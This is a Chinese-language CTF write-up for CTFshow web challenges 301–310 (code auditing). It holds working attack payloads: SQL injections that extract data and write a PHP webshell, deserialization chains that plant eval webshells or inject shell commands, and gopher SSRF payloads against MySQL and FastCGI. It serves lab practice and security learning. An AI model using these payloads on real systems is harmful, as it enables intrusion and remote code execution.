CTFSHOW-WEB入门代码审计篇

2024-03-07 13:10:21

web301

漏洞点checklogin.php

$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";

sqlmap一把梭出来账号密码登录拿到flag

web302

更改部分

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){

sqlmap跑出来账号密码却不知为何无法登录，然后尝试写入webshell

payload

userid=a'%20union%20select%20"<?php%20phpinfo();?>"%20into%20outfile%20"/var/www/html/a.php"%23&userpwd=b

访问a.php

写入一句话然后查看文件

web303

弱口令admin admin登录

然后审计代码,发现在dptadd.php中提交的信息会通过inster存入到数据库中，但是并未做任何过滤，inster注入尝试

payload

123' and updatexml(1,concat(0x7e,database()),0)#

123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#

123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g'),0x7e),1)#

123' and updatexml(1,concat(0x7e,substr((select group_concat(flag) from sds_fl9g),1,30),0x7e),1)#
123' and updatexml(1,concat(0x7e,substr((select group_concat(flag) from sds_fl9g),30,60),0x7e),1)#

web304

注入点处和上题没区别，按照上一题的payload走就好

web305

审计代码发现存在反序列化且用户和密码可控，file_put_contents尝试写入一句话

class user{
	public $username;
	public $password;
	public function __construct($u,$p){
		$this->username=$u;
		$this->password=$p;
	}
	public function __destruct(){
		file_put_contents($this->username, $this->password);
	}
}
$a = new user('1.php',"<?php @eval(\$_POST[1]);?>");
echo urlencode(serialize($a));

利用点在checklogin.php中，设置一个为user的cookie

写入之后没有看到flag文件，蚁剑链接,还是没有找到，然后看到conn文件有mysql账号密码，尝试连接一波mysql，使用mysqli类型，成功连接

在数据库中拿到flag

web306

审计代码在class文件中发现file_put_contents,且当前类中属性都是可控的

然后就去找调用close()的

这两个关键代码看了之后利用方法就很清晰了，class.php中的log类写文件，然后dao.php去调用close(),利用文件是index.php文件

<?php
class log{
	public $title='1.php'; 
	public $info='<?php eval($_POST[1]);?>';
}

class dao{
	private $conn;
	function __construct(){
	    $this->conn=new log();
	}
}

$d =new dao();
echo base64_encode(serialize($d));
?>

web307

刚开始我看完代码之后觉得和上面一题并没有什么区别，payload打了之后并没有成功，然后又看了一遍发现，class.php文件发生了变化

就没办法利用上一题的利用方法了，然后在dao.php看到shell_exec

命令执行。实例化时$this->config=new config()

config文件

然后config类的cache_dir可控

<?php
class config{
    public $cache_dir = 'cache/*;cat /var/www/html/flag.php > /var/www/html/1.txt;';
}
class dao
{
    private $config;

    public function __construct()
    {
        $this->config = new config();
    }
}
echo base64_encode(serialize(new dao()));

构造出来之后就是要找到利用点了，全局搜索clearCache 在logout.php中找到利用点

web308

多了一个checkVersion()

先找利用点，新增的肯定是利用点啦，全局搜索checkVersion，在index.php中

config.php文件

这个url，ssrf了应该是，然后又没有密码，就尝试ssrf打mysql，使用Gopherus写入shell。

exp

<?php

class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}

class config{
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%01%00%00%00%01';
}

$d= new dao();
echo base64_encode(serialize($d));
?>

web309

题目提示不能使用308的方法了，mysql有密码了，ssrf 打 FastCGI

exp

<?php

class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}

class config{
    public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27whoami%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}

$d= new dao();
echo base64_encode(serialize($d));
?>

然后直接去读目录下的flag所在文件

web310

依旧是打 FastCGI

exp

<?php

class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}

class config{
    public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27whoami%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}

$d= new dao();
echo base64_encode(serialize($d));
?>